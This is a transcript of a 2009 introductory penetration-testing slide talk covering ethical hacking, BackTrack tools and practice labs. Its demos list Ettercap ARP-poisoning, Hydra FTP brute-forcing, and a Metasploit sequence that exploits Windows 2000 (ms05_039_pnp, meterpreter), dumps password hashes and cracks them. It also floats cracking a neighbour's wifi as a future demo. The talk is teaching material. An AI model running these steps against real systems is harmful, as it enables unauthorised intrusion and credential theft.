Hack Attack! An Introduction to Penetration Testing
-
Upload
steve-phillips -
Category
Technology
-
view
9.210 -
download
2
description
Transcript of Hack Attack! An Introduction to Penetration Testing
Hack Attack!An Introduction to Penetration Testing
Steve Phillips (aka fraktil)2009.12.17 @ SBLUG
Who Am I?● Attended UCSB 2004-2008
– Majored in Math and Philosophy, not CS● Started using Linux in 2001
– Mandrake, then Slackware, then Debian● Applying for penetration testing job in January● Biases/“Preferences”
– Linux > Windoze (duh)– Python > Ruby– Emacs > vi– Debian (and variants) > others
Can Hacking Be Ethical?Or, what is Ethical Hacking?
● Black Hat– Compromises computer systems without permission– Criminal
● White Hat, aka Ethical Hacker– Gets paid to hack – legally (friggin' sweet)– Always gets permission before attacking a system
● Gray Hat– Some combination of Black and White
The Stages of Hackerdom● Script Kiddie (“skiddie”)
– Can only run automated tools– Doesn't understand underlying technology
● Advanced Beginner– Mastered advanced features of many tools– Knows enough programming to create own tools
● C => Python, Ruby (see next slide)● Uberhacker
– Discovers new vulnerabilities (or new types of vulns)– Knows Assembly, C, Python and/or Ruby, SQL– Excellent programmer; writes tools, scripts regularly– Can defend as well as attack (firewalls, IDS, etc)
Programming Languages Used to Create Hacking Tools
● C– Nmap (network mapper, portscanner, more)– Nessus (vulnerability detection)– Wireshark (network sniffer)
● Python– w3af (web app attack framework)– sqlmap (automatic SQL injection)– TheMiddler (session hijacking, targeted pw sniffing)
● Ruby– Metasploit (vuln exploitation, much more)
What About in Back|Track 4?Overall: Tools + Exploits
● File count: find /pentest | grep \\.c$ | wc -l● Line count: cat $(find /pentest | grep \\.c$) | wc -l
● C: 4058 .c files 1,300,000 lines● Python: 2431 .py files 612,000 lines● Ruby: 5468 .rb files 694,000 lines
● 2773 files from Metasploit● 1271 files from Dradis (information organizing, sharing)● 1424 other
● C++: 431 .cpp files 144,000 lines
What About in Back|Track 4?Exploits Only (from exploitdb)
● C– 1321 .c files
● Python– 405 .py files
● Ruby– 146 .rb files
● C++– 110 .cpp files
TIOBE IndexProgramming Language Popularity
Back|Track 4 Categories● Information Gathering
– Email addresses, DNS● Network Mapping● Vulnerability Identification● Web Application Analysis● Radio Network Analysis● Penetration (not that kind)
Back|Track 4 Categories
● Privilege Escalation● Maintaining Access● Digital Forensics● Reverse Engineering● VoIP (Voice over Internet Protocol)● Misc
DEMO: Sniffing Passwordswith Ettercap
● ARP Poisoning for MitM Attack– Associate attacker's MAC with router's IP– Target tries to route traffic through router
● Routes it through attacker instead– Attacker forwards traffic both ways– Attacker can silently watch or inject traffic
● TheMiddler, sslstrip
How Else Can We Get Creds?● Phishing
– Via email● Spear Phishing
– Becoming popular– Very hard to stop
● In-person Social Engineering– Kevin Mitnick is famous for this
● Brute force
DEMO: Bruteforcing FTP
● Using Hydra to bruteforce weak FTP password– Well, really a dictionary attack
DEMO: Pwning Win2k● Create database (or connect to existing)
– db_create [optional_database_name]● Find win2k box using nmap (in metasploit)
– db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24● Search Metasploit for win2k exploits
– search 2000● Use exploit w/meterpreter
– use exploit/windows/smb/ms05_039_pnp– set PAYLOAD windows/meterpreter/bind_tcp
● Which parameters still need to be set?– show options
DEMO: Pwning Win2k● Set parameters
– set RHOST [target_ip]● Now we exploit! Can you guess the command?
– exploit● Get hashes
– hashdump– This would be much harder without meterpreter!
● Copy and paste hashes into new text file● Crack hashes with john the ripper
– ./john [file_containing_hashes].txt● Game Over
Why Become an Ethical Hacker?
● Field is growing (see next slide)– New laws, regulations– US government falling behind in cyber security
● You get paid to hack – need I say more?– Banks– Telecoms– Casinos– Foreign countries (for the federal gov't)
How Can I Practice Legally?● Virtualization (VMware, VirtualBox)
– Use virtual images from recent CTF competitions● http://lampsecurity.org/capture-the-flag-6● http://ctf.hcesperer.org/25c3ctf● http://ctf.hcesperer.org/daopen08● http://ctf.hcesperer.org/eh08ctf
● NetWars– Part of government's Cyber Defense Initiative 2009
● DVL: Damn Vulnerable Linux– Purposely misconfigured, exploitable– http://tinyurl.com/dvllinux15
Further ResourcesLearning
● Metasploit– Online Class: http://www.offensive-
security.com/metasploit-unleashed/● Nmap Guide
– http://nmap.org/book/man.html● Security Videos, Tutorials
– http://securitytube.net
Tools Added to Back|TrackExtra Tools I Used
● Metasploit 3.3.2 (updated)● Nmap 5.0 (updated)
● Exploitdb archive (/pentest/exploits/exlpoitdb)
Summary
● Hacking can be ethical● “Computer security” is an oxymoron
– No one is safe● REALLY powerful hacking tools exist● Metasploit is effing dangerous
Future Demos?
● More local fun– Crack neighbor's wifi (WEP)– Exploit remote vuln in DD-WRT firmware– Redirecting traffic using fake DNS server– Intercepting Twitter, Facebook, LinkedIn creds
● More like real pen testing– SQL injection– XSS– Nessus scan
Contact Information
● Name: Steve Phillips● New Blog: SweetHack.blogspot.com● Email: [email protected]● Twitter: twitter.com/fraktil● LinkedIn: linkedin.com/in/sdphillips● IRC: fraktil in #sblug on borg-cube.com
Questions?